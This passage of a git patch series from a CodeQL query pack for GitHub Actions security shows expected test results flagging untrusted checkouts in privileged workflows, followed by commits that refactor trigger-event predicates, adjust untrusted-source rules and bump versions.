.github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | +| .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | +| .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | +| .github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From a057b9dd4456c58d475a784a898acdbb81fbaa20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:39:34 +0200 Subject: [PATCH 0612/1267] Add poisonable step for azure/powershell --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2ee9af6904e..e32bc48a983 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -4,6 +4,7 @@ extensions: extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: + - ["azure/powershell"] - ["pre-commit/action"] - ["oxsecurity/megalinter"] - ["bridgecrewio/checkov-action"] From b2a3aaacfd0b1fecd8aa8a609c05eafec16950a5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:40:25 +0200 Subject: [PATCH 0613/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 404c86d212c..5cf09c3601f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.72 +version: 0.1.73 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1296bbd667b..25486553ea8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.72 +version: 0.1.73 groups: [actions, queries] suites: codeql-suites extractor: javascript From d1d92ae68a25bee131e3fb60c5428cbc124027bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 10:13:20 +0200 Subject: [PATCH 0614/1267] Create getATriggerEvent for Steps and refactor the code to use it --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 +- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 2 +- .../security/OutputClobberingQuery.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.actual | 342 ------------------ .../UntrustedCheckoutCritical.expected | 2 + 9 files changed, 25 insertions(+), 360 deletions(-) delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e41354ce31b..ad7bd67a18c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -17,6 +17,8 @@ class AstNode instanceof AstNodeImpl { Job getEnclosingJob() { result = super.getEnclosingJob() } + Event getATriggerEvent() { result = super.getATriggerEvent() } + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } @@ -100,8 +102,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } @@ -200,8 +200,6 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - Event getATriggerEvent() { result = super.getATriggerEvent() } - Strategy getStrategy() { result = super.getStrategy() } string getARunsOnLabel() { result = super.getARunsOnLabel() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 67ef99e0fc8..ce6db22636c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -111,6 +111,11 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets and Event triggering this node. + */ + EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + /** * Gets the enclosing Step. */ @@ -447,7 +452,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } - EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + override EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -486,7 +491,7 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } + override EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } @@ -918,7 +923,7 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { + override EventImpl getATriggerEvent() { if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl then result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() @@ -1174,6 +1179,8 @@ class StepImpl extends AstNodeImpl, TStepNode { result = super.getEnclosingJob() } + override EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index e0d46c7196d..0dca5bf45fb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -91,7 +91,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout @@ -239,7 +239,7 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 6293e4d6f3d..9b50a14bca2 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -57,7 +57,7 @@ abstract class ControlCheck extends AstNode { // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event - this.getEnclosingJob().getATriggerEvent() = event + this.getATriggerEvent() = event } predicate dominates(AstNode node) { diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5850aa91e6e..e6cc0d06a46 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -30,7 +30,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() + uses.getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ea3f4c3c269..01da214b6ea 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,7 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -79,7 +79,7 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global Date: Wed, 23 Oct 2024 10:37:33 +0200 Subject: [PATCH 0615/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cf09c3601f..608e186ffcd 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.73 +version: 0.1.74 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 25486553ea8..cdd396f985c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.73 +version: 0.1.74 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9bb42a46ce043675aa1431667e2c0297733803a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:14:20 +0200 Subject: [PATCH 0616/1267] Enforce a checkout kind of trigger to consider gh pr/gh api ... pulls as a source of untrusted data --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dca5bf45fb..7dfdc42b05e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -129,7 +129,13 @@ class GhCLICommandSource extends RemoteFlowSource, CommandSource { run.getScript().getAStmt() = cmd and cmd.indexOf("gh ") = 0 and untrustedGhCommandDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex + ".*") + cmd.regexpMatch(cmd_regex + ".*") and + ( + cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") and + run.getATriggerEvent().getName() = checkoutTriggers() + or + not cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") + ) ) } From fef37b6025485c0ba0f80f1c07a62fafabdb6b1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:26 +0200 Subject: [PATCH 0617/1267] Remove pull_request from context event map so that accesss to github.event.pull_request are not considered a source for pull_request triggers --- ql/lib/ext/config/context_event_map.yml | 4 ---- ql/lib/ext/config/externally_triggereable_events.yml | 1 - 2 files changed, 5 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index a5e8ced2e9e..35ccafc5bee 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -17,10 +17,6 @@ extensions: - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] - ["gollum", "github.event.changes"] - - ["merge_group", "github.event.merge_group"] - - ["pull_request", "github.event.pull_request"] - - ["pull_request", "github.head_ref"] - - ["pull_request", "github.event.changes"] - 